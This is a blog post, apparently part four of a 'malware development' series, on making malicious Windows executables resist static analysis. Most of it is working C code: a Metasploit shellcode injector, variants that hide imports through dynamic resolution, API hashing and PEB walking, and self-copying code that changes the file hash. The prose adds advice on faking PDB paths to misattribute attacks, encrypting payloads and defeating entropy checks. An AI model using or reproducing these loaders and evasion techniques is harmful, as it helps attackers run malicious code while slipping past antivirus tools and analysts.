Malware development part 4 - anti static analysis tricks
Introduction
This is the fourth post of a series which regards the development of malicious software. In this series we will explore and try to implement multiple techniques used by malicious applications to execute code, hide from defenses and persist.
In the previous part of the series we discussed methods for detecting sandboxes, virtual machines, automated analysis and making manual debugging harder for an analyst.
In this post we will talk more about compiling and linking the code with Visual Studio. Then we will focus on static analysis and obfuscation.
Note: we assume 64-bit execution environment - some code samples may not work for x86 applications (for example due to hardcoded 8-byte pointer length or different data layout in PE and PEB). Also, error checks and cleanups are ommited in the code samples below.
Executable creation with Visual Studio
Let’s create a new project in Visual Studio and browse through compilation and linking options to see what’s there. We will use this simple Metasploit shellcode injector:
void main()
{
unsigned char shellcode[] = "\\xfc\\x48\\x83 (...) ";
PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
DWORD threadID;
HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
WaitForSingleObject(hThread, INFINITE);
}
Some of compilation and linking settings may introduce changes to the binary to make it smaller (thus easier to deliver) or more difficult to debug and reverse engineer.
Compiler options
C runtime library (/MT)
First thing we should do is to force application to use static version of runtime (CRT) library - otherwise it won’t run on computers without MSVCRT installed. This may significantly increase the executable size as the necessary libraries must be embedded into it.
When you develop a regular application it’s usually better to use shared runtime library available on the system (you can always bundle it within the installer). However it’s not the case with malware - we’d like it to be as much portable as possible.
There is a way to decrease executable size and use some of CRT features. We can use msvcrt.dll
library which is available on every Windows version since 95. We will need to create own version of static library msvcrt.lib
from the msvcrt.dll
library as described here. Using custom CRT static library instead of one automatically added by Visual Studio (thanks to /NODEFAULTLIB
linker argument) allowed to drop the executable size from almost to just around 4 KB. Also, _NO_CRT_STDIO_INLINE
may have to be defined.
EDIT
For more details on using builtin msvcrt.dll
check out this great post by Solomon Sklash.
Code optimization (/O1, /O2 etc.)
There are two code optimization strategies - to favour speed or size. Each causes compiler to apply some techniques that change the code and possibly make the assembly a little bit harder to read and understand. For example, a debugger may not be able to evaluate values of certain (optimized) variables. Some instructions can be replaced with less obvious ones which however produce the same result. Inline functions can cause the code to be harder to understand because it will have a less number of logically separated functional blocks.
__forceinline
directive can be used to mark specific functions to be inlined during compilation, regardless compiler optimization.
Linker options
Debug information (/DEBUG)
There is a very specific debug information - .PDB
file path - that is placed in the final executable which can contain sensitive information. Just imagine a pedantic developer with organized directory structure and names - .PDB
file path could be for example: "C:\\users\\nameSurname\\Desktop\\companyName\\clientName\\assessmentDate\\MaliciousApp\\Release\\MaliciousApp.pdb"
. It’s very important to dismiss that information from final executable. We could also craft a fake .PDB
file path to fool researchers, for example to get our malware attributed to different group.
Be sure to check out this FireEye article on extracting information from malware samples.
UAC settings in manifest (/MANIFESTUAC)
This particular option does not change the code itself however it’s worth mentioning.
We can configure the application to prompt user for consent or credentials (depending on system settings) to run with administrative privileges. This can sometimes come in handy as a UAC “bypass” - need higher privileges? Just ask the user! However this may raise suspicions of some users thus should be used ony in specific circumstances. Anyway, we can set UAC level to highestAvailable
- application will require admin consent or credentials only if the user is a member of local Administrators
group.
Static analysis and obfuscation
Let’s now focus on some more interesting stuff - what we can do to obfuscate our code. We want as least information as possible to be visible during static inspection of a binary.
Windows executable file (Portable Executable) contains several information particularly interesting from the reverse engineer’s perspective: headers, sections headers and content (code, resources etc.), imported and exported functions, timestamp. An analyst can extract a bunch of useful information just by inspecting the executable (without running it). This includes the code, imported functions, hardcoded strings and other data. Static PE file analysis can also indicate use of a packer or other obfuscation techniques. And of course, the easiest thing to do is to calculate the file hash and look it up in a database (VirusTotal etc.).
So, how do we fight static analysis techniques?
Changing file hash
Knowing that just a single bit change in the file causes its hash to be completely different, we can introduce simple polymorphism to the code. The basic idea is to replicate the executable while for example adding a null byte at the end. More sophisticated approach could include introducing changes to a resource (e.g. icon) embedded in the executable.
I don’t think it’s possible to delete an executable associated with running process. It’s possible though to rename a file which is being executed. However we need to start another process which will wait for the main process to terminate and then modify the binary on disk and relaunch the malicious application. We can also replicate the executable (changing the last character of its name) and modify the copy:
wchar_t oldExecutablePath[MAX_PATH];
wchar_t newExecutablePath[MAX_PATH];
size_t executablePathLength;
GetModuleFileName(NULL, oldExecutablePath, MAX_PATH);
StringCchCopy(newExecutablePath, MAX_PATH, oldExecutablePath);
StringCchLengthW(oldExecutablePath, MAX_PATH, &executablePathLength);
wchar_t mutatingChar = newExecutablePath[executablePathLength - 5];
newExecutablePath[executablePathLength - 5] = mutatingChar / 2 * 2 + !(mutatingChar % 2);
CopyFile(oldExecutablePath, newExecutablePath, FALSE);
HANDLE hFile = CreateFile(newExecutablePath, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD bytesWritten;
SetFilePointer(hFile, 0, NULL, FILE_END);
char toWrite[] = "\\0";
WriteFile(hFile, toWrite, 1, &bytesWritten, NULL);
CloseHandle(hFile);
// Make sure that newExecutablePath is run next time - e.g. modify persistence entry
Hiding imports via dynamic WinAPI functions resolving
Import Address Table (IAT) stores information about libraries and functions that are used by the application. OS dynamically loads them at the executable startup. Very convinient (well it’s just how Windows works) however the table contents can give a lot of information about program functionality. For example memory operations and thread operation functions (VirtualAlloc
, VirtualProcect
, CreateRemoteThread
) can indicate that the application is performing some kind of code injection. WSASocket
is often used by bind and reverse shells, and SetWindowsHookEx
by keyloggers.
Our simple code has the following imports (listed using Dependencies tool:
To hide this information (from static analysis) we can dynamically resolve certain API functions. We could even use syscalls (see userland hooks evasion). For now lets just use GetModuleHandle
to obtain handle to kernel32.dll
loaded in memory and then find necessary functions with GetProcAddress
:
typedef PVOID(WINAPI *PVirtualAlloc)(PVOID, SIZE_T, DWORD, DWORD);
typedef PVOID(WINAPI *PCreateThread)(PSECURITY_ATTRIBUTES, SIZE_T, PTHREAD_START_ROUTINE, PVOID, DWORD, PDWORD);
typedef PVOID(WINAPI *PWaitForSingleObject)(HANDLE, DWORD);
void main()
{
HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
PVirtualAlloc funcVirtualAlloc = (PVirtualAlloc)GetProcAddress(hKernel32, "VirtualAlloc");
PCreateThread funcCreateThread = (PCreateThread)GetProcAddress(hKernel32, "CreateThread");
PWaitForSingleObject funcWaitForSingleObject = (PWaitForSingleObject)GetProcAddress(hKernel32, "WaitForSingleObject");
unsigned char shellcode[] = "\\xfc\\x48\\x83 (...) ";
PVOID shellcode_exec = funcVirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_exec, shellcode, sizeof shellcode);
DWORD threadID;
HANDLE hThread = funcCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
funcWaitForSingleObject(hThread, INFINITE);
}
Now suspicious functions are resolved dynamically and there’s no indication of them in IAT:
Of course we can take obfuscation further and add some irrelevant functions to “fill” the IAT and make the application seemingly more legitimate. Another important thing to do is to encrypt strings with function names - we don’t want them to be visible just by grepping the binary.
However our table of imports now contains GetModuleHandle
and GetProcAddress
functions which happen to be quite strong indicators of malware, particularly packed executables. Our application may now be even more suspicious than before. Let’s hide these imports, too.
API hashing
Instead of encoding/encrypting function names (which the application is going to dynamically resolve) we can calculate hashes of all function names exported by a specific library and then select appropriate functions based on a list of such hashes hardcoded in an executable. To do this we can manually walk through the library’s export table.
Let’s use some simple hashing function like djb2 but replace the 5381
constant with something else. We could use any hashing function along with a salt to defeat easy hash calculation by malware analyst.
We have precalculated hashes for certain kernel32.dll
imports - all we need to do is browse the library exports and calculate functions names hashes.
typedef PVOID(WINAPI *PVirtualAlloc)(PVOID, SIZE_T, DWORD, DWORD);
typedef PVOID(WINAPI *PCreateThread)(PSECURITY_ATTRIBUTES, SIZE_T, PTHREAD_START_ROUTINE, PVOID, DWORD, PDWORD);
typedef PVOID(WINAPI *PWaitForSingleObject)(HANDLE, DWORD);
unsigned int hash(const char *str)
{
unsigned int hash = 7759;
int c;
while (c = *str++)
hash = ((hash << 5) + hash) + c;
return hash;
}
void main()
{
HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
PVirtualAlloc funcVirtualAlloc;
PCreateThread funcCreateThread;
PWaitForSingleObject funcWaitForSingleObject;
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hKernel32;
PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)hKernel32 + pDosHeader->e_lfanew);
PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER)&(pNtHeader->OptionalHeader);
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)hKernel32 + pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PULONG pAddressOfFunctions = (PULONG)((PBYTE)hKernel32 + pExportDirectory->AddressOfFunctions);
PULONG pAddressOfNames = (PULONG)((PBYTE)hKernel32 + pExportDirectory->AddressOfNames);
PUSHORT pAddressOfNameOrdinals = (PUSHORT)((PBYTE)hKernel32 + pExportDirectory->AddressOfNameOrdinals);
for (int i = 0; i < pExportDirectory->NumberOfNames; ++i)
{
PCSTR pFunctionName = (PSTR)((PBYTE)hKernel32 + pAddressOfNames[i]);
if (hash(pFunctionName) == 0x80fa57e1)
{
funcVirtualAlloc = (PVirtualAlloc)((PBYTE)hKernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
}
if (hash(pFunctionName) == 0xc7d73c9b)
{
funcCreateThread = (PCreateThread)((PBYTE)hKernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
}
if (hash(pFunctionName) == 0x50c272c4)
{
funcWaitForSingleObject = (PWaitForSingleObject)((PBYTE)hKernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
}
}
unsigned char shellcode[] = "\\xfc\\x48\\x83";
PVOID shellcode_exec = funcVirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_exec, shellcode, sizeof shellcode);
DWORD threadID;
HANDLE hThread = funcCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
funcWaitForSingleObject(hThread, INFINITE);
}
Bootstrapping: shellcode-style
Still, we used GetModuleHandle
function to locate kernel32.dll
in memory. It’s possible to go around this by finding library location in the process environment block.
We can leverage several facts (below applies for x64 architecture; offsets are different for x86):
- PEB address is located at an address relative to
GS
register:GS:[0x60]
_PEB_LDR_DATA
structure (containing information about all loaded modules) is located at$PEB:[0x18]
- Loader data contains pointer to
InMemoryOrderModuleList
at offset0x20
InMemoryOrderModuleList
is a doubly linked list ofLDR_DATA_TABLE_ENTRY
structures, each containsBaseDllName
andDllBase
of a single module- We can browse all loaded modules, find
kernel32.dll
and it’s base address - Knowing
kernel32.dll
location in memory, we can find its export directory and browse it forGetProcAddress
function - Using
GetProcAddress
we can find other necessary functions and load all needed modules
Let’s implement this procedure:
typedef HMODULE(WINAPI *PGetModuleHandleA)(PCSTR);
typedef FARPROC(WINAPI *PGetProcAddress)(HMODULE, PCSTR);
typedef PVOID(WINAPI *PVirtualAlloc)(PVOID, SIZE_T, DWORD, DWORD);
typedef PVOID(WINAPI *PCreateThread)(PSECURITY_ATTRIBUTES, SIZE_T, PTHREAD_START_ROUTINE, PVOID, DWORD, PDWORD);
typedef PVOID(WINAPI *PWaitForSingleObject)(HANDLE, DWORD);
void main()
{
PPEB pPEB = (PPEB)__readgsqword(0x60);
PPEB_LDR_DATA pLoaderData = pPEB->Ldr;
PLIST_ENTRY listHead = &pLoaderData->InMemoryOrderModuleList;
PLIST_ENTRY listCurrent = listHead->Flink;
PVOID kernel32Address;
do
{
PLDR_DATA_TABLE_ENTRY dllEntry = CONTAINING_RECORD(listCurrent, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
DWORD dllNameLength = WideCharToMultiByte(CP_ACP, 0, dllEntry->FullDllName.Buffer, dllEntry->FullDllName.Length, NULL, 0, NULL, NULL);
PCHAR dllName = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dllNameLength);
WideCharToMultiByte(CP_ACP, 0, dllEntry->FullDllName.Buffer, dllEntry->FullDllName.Length, dllName, dllNameLength, NULL, NULL);
CharUpperA(dllName);
if (strstr(dllName, "KERNEL32.DLL"))
{
kernel32Address = dllEntry->DllBase;
HeapFree(GetProcessHeap(), 0, dllName);
break;
}
HeapFree(GetProcessHeap(), 0, dllName);
listCurrent = listCurrent->Flink;
} while (listCurrent != listHead);
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32Address;
PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)kernel32Address + pDosHeader->e_lfanew);
PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER)&(pNtHeader->OptionalHeader);
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)kernel32Address + pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PULONG pAddressOfFunctions = (PULONG)((PBYTE)kernel32Address + pExportDirectory->AddressOfFunctions);
PULONG pAddressOfNames = (PULONG)((PBYTE)kernel32Address + pExportDirectory->AddressOfNames);
PUSHORT pAddressOfNameOrdinals = (PUSHORT)((PBYTE)kernel32Address + pExportDirectory->AddressOfNameOrdinals);
PGetModuleHandleA pGetModuleHandleA = NULL;
PGetProcAddress pGetProcAddress = NULL;
for (int i = 0; i < pExportDirectory->NumberOfNames; ++i)
{
PCSTR pFunctionName = (PSTR)((PBYTE)kernel32Address + pAddressOfNames[i]);
if (!strcmp(pFunctionName, "GetModuleHandleA"))
{
pGetModuleHandleA = (PGetModuleHandleA)((PBYTE)kernel32Address + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
}
if (!strcmp(pFunctionName, "GetProcAddress"))
{
pGetProcAddress = (PGetProcAddress)((PBYTE)kernel32Address + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
}
}
HMODULE hKernel32 = pGetModuleHandleA("kernel32.dll");
PVirtualAlloc funcVirtualAlloc = (PVirtualAlloc)pGetProcAddress(hKernel32, "VirtualAlloc");
PCreateThread funcCreateThread = (PCreateThread)pGetProcAddress(hKernel32, "CreateThread");
PWaitForSingleObject funcWaitForSingleObject = (PWaitForSingleObject)pGetProcAddress(hKernel32, "WaitForSingleObject");
unsigned char shellcode[] = "\\xfc\\x48\\x83 (...) ";
PVOID shellcode_exec = funcVirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_exec, shellcode, sizeof shellcode);
DWORD threadID;
HANDLE hThread = funcCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
funcWaitForSingleObject(hThread, INFINITE);
}
PE analysis and indicators
While statically examining a malicious sample, malware analysts look at PE file structure and contents. This data may reveal certain details about the application and help classify it as a malware. We talked about imports, now let’s focus on other PE sections, embedded resources and timestamps.
Sections
The thing to note here is that we should ensure that section names reflect a legitimate, compiled PE structure. For example, packers may change sections names to random character strings or even obvious indicators of packer software (UPX0
, UPX1
etc.).
Adding a new section may also raise suspicions - it may be better idea to store data in the existing resources section.
Also, section raw size (size on disk) should usually be almost equal to virtual size (size in memory when the image is loaded) - small differences are common due to different memory alignments (disk vs RAM). For example, .text
section with raw size of 0
and virtual size of hundreds of KBs probably means that the actual executable was packed.
Resources
We can embed any data in the executable as a resource - for example an icon, a decoy document or a shellcode. However everything will be visible with Resource Hacker
or any similar tool. It is a good idea to embed malicious resources encrypted or using steganography to make it more difficult to inspect them.
Timestamp
PE header contains TimeDateStamp
4-byte field which is Unix time of compilation. This can be easily changed (for example with hex editor) to hide the actual compilation date.
Entropy analysis
Entropy analysis can be used to easily find potentially encrypted content embedded in the executable. Encrypted data usually has relatively high entropy (almost 8 bits). The same applies for compressed data.
We can use this simple Python script (be sure to install pefile
module) to calculate the entropy of PE file sections:
import sys
import math
import pefile
import peutils
def Entropy(data):
entropy = 0
if not data:
return 0
ent = 0
for x in range(256):
p_x = float(data.count(x))/len(data)
if p_x > 0:
entropy += - p_x*math.log(p_x, 2)
return entropy
pe=pefile.PE(sys.argv[1])
for s in pe.sections:
print (s.Name.decode('utf-8').strip('\\x00') + "\\t" + str(Entropy(s.get_data())))
Let’s start with simple shellcode loader we developed before. Here’s sections entropy:
.text 4.616090501867742
.rdata 5.4577520758849944
.pdata 0.10191042566270775
.rsrc 4.7015032582517895
Application code located in .text.
section has entropy comparable with human language text. Shellcode is located in .rdata
section which has a slightly higher entropy.
Now let’s embed some large blob of encrypted data, for example by adding a resource to the executable. As we can see below, the .rsrc
section probably contains some encrypted or compressed data. Actually, it could be some image or any other file format which uses compression.
.text 4.616090501867742
.rdata 5.458570681613711
.pdata 0.10191042566270775
.rsrc 7.95737230129355
To simply manipulate the entropy of a data block, we could use Base64 encoding. See the entropy values for plain shellcode, AES-encrypted, GZIP-compressed and Base64-encoded. So to defeat basic entropy analysis we could encrypt and then encode the data/payload using for example a custom variation of Base64 (or Base62 or any other - entropy of BaseN encoded data will be roughly equal to log2(N) ).
Summary
We’ve gone through some techniques that can be used to make the static analysis of our malicious application slightly harder, mainly focusing on PE format and common indicators.
In the next article we will talk about other tricks used to further obfuscate malware.